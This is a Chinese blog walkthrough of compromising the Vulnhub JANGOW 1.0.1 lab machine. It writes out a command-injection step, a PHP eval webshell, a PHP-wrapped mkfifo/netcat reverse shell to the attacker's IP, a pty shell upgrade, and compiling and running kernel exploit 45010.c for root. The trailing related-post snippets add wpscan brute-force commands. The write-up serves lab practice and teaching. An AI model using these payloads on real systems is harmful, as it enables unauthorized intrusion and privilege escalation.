首页 > 其他分享 >【渗透测试】 Vulnhub JANGOW: 1.0.1

【渗透测试】 Vulnhub JANGOW: 1.0.1

时间:2023-08-20 21:13:38浏览次数:44  
标签:tmp 1.0 192.168 nc 端口 JANGOW Vulnhub aaa 靶机

渗透环境

攻击机:   IP: 192.168.149.128(Kali)
靶机:     IP:192.168.149.129
靶机下载地址:https://www.vulnhub.com/entry/jangow-101,754/

进行渗透

一、 获取IP及端口信息

使用nmap扫描同网段IP,如果使用的是VMware可能出现扫描不到的情况,需要在靶机的恢复模式里重新配置一下靶机的网卡,网上教程很多,这里就不展开讲了。

nmap -sn 192.168.149.0/24

获得靶机的IP为192.168.149.129
接下来对端口进行扫描(稍微有点久)

nmap -sV -p- -A -O 192.168.149.129

我们知道靶机开放了21和80端口,并且知道了软件的版本号和操作系统。


二、 尝试寻找漏洞并利用

1. 访问80端口

打开网站有多个可以跳转的链接,逐一点开,发现一个可以的get型参数

试一下在此输入命令whoami,发现可以执行。
img

2. 进行攻击

既然可以执行命令,我们就尝试反弹shell。但是尝试过后发现,无论使用bash -i还是使用nc都无法反弹shell。
接下来尝试写入一句话木马

echo '<?php @eval($_POST['soap']); ?>' >> Mr_Soap.php

img

查看目录,发现我们的一句话木马已经写入

img

接下来使用蚁剑进行连接

连接后浏览目录,发现一个可疑文件,并在其中发现用户名和密码。

img

我们刚才扫描出一个21端口,我们尝试使用这个用户进行登录

登录成功但是没有发现有用的文件

二、 提权

接下来我们还是使用nc进行连接。我们写入一个nc.php,在其中调用system函数,让其在bash中执行nc连接。

<?php system("rm /tmp/aaa; mkfifo /tmp/aaa; cat /tmp/aaa | /bin/sh -i 2>&1 | nc 192.168.149.128 443 >/tmp/aaa");?>

rm /tmp/aaa:删除名为 /tmp/aaa 的文件(如果存在)。
mkfifo /tmp/aaa:创建一个命名管道(FIFO)文件 /tmp/aaa。
cat /tmp/aaa|/bin/sh -i 2>&1:将 /tmp/aaa 中的内容传递给 /bin/sh(Bash shell),实现交互式的命令执行。
nc 192.168.149.128 443 >/tmp/aaa:通过 netcat (nc) 命令将标准输入和输出重定向到 /tmp/aaa,将命令输出发送到 IP 地址为 192.168.149.128,端口号为 443 的远程主机。

img

这里经过尝试只能使用443端口,其他端口不可行。443为默认的https端口,但是这台机器没有在上面启用服务,所以我们才想到用443进行测试,发现可以成功反弹shell。

接下来先在kali中队443端口进行监听,然后访问192.168.149.129/site/nc.php

成功反弹shell

在当前终端中创建一个交互式的bash终端

python3 -c 'import pty;pty.spawn("/bin/bash")'

img

这使用户能够执行命令并与系统交互,就像直接在一个正常的终端中一样
接下来我们尝试使用刚才获取的用户名和密码进行登录,并使用命令sudo -l查看这个用户能使用哪些sudo命令

img

这个用户没有什么可利用的地方,那就只能再找找看有没有系统漏洞。
查看系统内核版本和发行版本

uname -a                #查看内核版本
lsb_release -a          #查看Ubuntu版本

img

img

搜索系统版本

searchsploit 4.4.0-31 ubuntu

img

图中红框内的三个漏洞标题中都含有Privilege Escalation,表明他们是用于提权的

接下来我们尝试使用红框内的第一个exp,先查看这个exp的路径(这些exp都是保存在本地的)

searchsploit -p 45010.c

img

接下来查看它的详细信息

cat /usr/share/exploitdb/exploits/linux/local/45010.c

img

在文件的头部我们可以看到使用方法,即gcc编译后再执行就可以了(不要忘记添加执行权限)

接下来我们把exp下载下来,在最下面可以看到保存的路径

searchsploit -m 45010.c

img

然后我们将其编译

gcc 45010.c -o exp

接下来我们将其传回去,一般情况下我们使用python开启一个简易服务器即可

服务器:python3 -m http.server [port]
客户机:wget [host:8000/filename]

但是经过尝试,传输失败,不要忘了该靶机还开了FTP服务,可以通过FTP进行传输,或者使用蚁剑传输都是可以的,这里我使用FTP进行传输。

img

成功将exp传入靶机/home/jangow01/exp,注意使用put传输文件时,该文件要存在kali当前的路径中。
接下来我们为这个文件添加执行权限,然后执行它,但是这里报错了

img

这是因为我这里的kali版本过高,使用高版本的GLIBC编译的文件无法在靶机中运行。
既然我们有源码,可以直接将源码传到靶机中(上面已经讲了如何传文件,这里不再赘述),在靶机中完成编译并执行。

img

这里看到我们的权限已经是root了。渗透完成。

标签:tmp,1.0,192.168,nc,端口,JANGOW,Vulnhub,aaa,靶机
From: https://www.cnblogs.com/MrSoap/p/17644557.html

相关文章

  • Vulnhub: DriftingBlues: 2靶机
    kali:192.168.111.111靶机:192.168.111.207信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.20780端口的/blog目录为wordpresswpscan收集wordpress用户和爆破密码wpscan--urlhttp://driftingblues.box/blog-eu,ap--plugins-detectionmi......
  • 接到一个新需求应该怎么做?(V1.0)
    接到一个新需求应该怎么做?(V1.0)1背景在做业务研发的时候,经常会接到一些产品需求/技术需求,无论需求大小,都需要一套可以重复使用的方法论,来保证整个项目的正常交付,这篇思考就是总结梳理抽象出这么一套方法论。从毕业工作到现在,没有真正思考过这类问题,一直觉得我的工作就是......
  • 【21.0】结合celery改造接口
    【一】引入所有接口都可以改造,尤其是查询所有的这种接口,如果加入缓存,会极大的提高查询速度首页轮播图接口:获取轮播图数据,加缓存---》咱们只是以它为例【二】改造轮播图接口luffyCity\luffyCity\apps\home\views.pyclassBannerView(GenericViewSet,CommonListMod......
  • 开源十年后 Cap’n Proto 1.0 终发布,比 Protocol Buffers 快太多
    导读Cap'nProto是一种速度极快的数据交换格式和capability-basedRPC系统,于2013年4月开源发布。时至今日,Cap'nProto1.0终于发布,这是一个长期支持版本。Cap'nProto是一种速度极快的数据交换格式和capability-basedRPC系统,于2013年4月开源发布。时至今......
  • 聊聊JDK1.0到JDK20的那些事儿
    1.前言最近小组在开展读书角活动,我们小组选的是《深入理解JVM虚拟机》,相信这本书对于各位程序猿们都不陌生,我也是之前在学校准备面试期间大致读过一遍,emm时隔多日,对里面的知识也就模糊了。这次开始的时候从前面的JDK发展史和JVM虚拟机家族着手,之前都是粗略读过,这次通过查阅相关......
  • TDengine 3.1.0.0 版本成功发布,涉及五大板块功能更新!
    自3.0版本发布以来,在研发人员和社区用户的不断努力下,时序数据库(TimeSeriesDatabase)TDengine 做了大量更新,产品性能、稳定性和易用性都在不断提升。近期,TDengine3.1.0.0 终于成功发布,下面我们向大家介绍一下这一版涉及到的重大更新。查询性能优化(开源版+企业版)主要优化......
  • 聊聊JDK1.0到JDK20的那些事儿
    1.前言最近小组在开展读书角活动,我们小组选的是《深入理解JVM虚拟机》,相信这本书对于各位程序猿们都不陌生,我也是之前在学校准备面试期间大致读过一遍,emm时隔多日,对里面的知识也就模糊了。这次开始的时候从前面的JDK发展史和JVM虚拟机家族着手,之前都是粗略读过,这次通过查阅相关资......
  • 聊聊JDK1.0到JDK20的那些事儿 | 京东云技术团队
    1.前言最近小组在开展读书角活动,我们小组选的是《深入理解JVM虚拟机》,相信这本书对于各位程序猿们都不陌生,我也是之前在学校准备面试期间大致读过一遍,emm时隔多日,对里面的知识也就模糊了。这次开始的时候从前面的JDK发展史和JVM虚拟机家族着手,之前都是粗略读过,这次通过查阅相关资料......
  • 1.0、Markdown文件导入到博客园
    前言博客园的Markdown语法编辑不太友好,大多都是使用Typora来进行编辑,然后再想办法上传到博客园上。方法安装.NetCoreSDK下载地址:https://dotnet.microsoft.com/en-us/learn/dotnet/hello-world-tutorial/install下载完成后直接双击默认安装即可安装dotnet-cnblog执行......
  • 【Vulnhub】OSCP
    靶场介绍靶场下载地址:https://www.vulnhub.com/entry/infosec-prep-oscp,508/靶场难度:容易kali:192.168.11.5靶机:192.168.11.13信息收集使用nmap扫描靶机开放的端口及服务nmap-A-T4-sS192.168.11.13可以看到靶机开启了22和80端口使用dirb扫描一下目录扫出来一个r......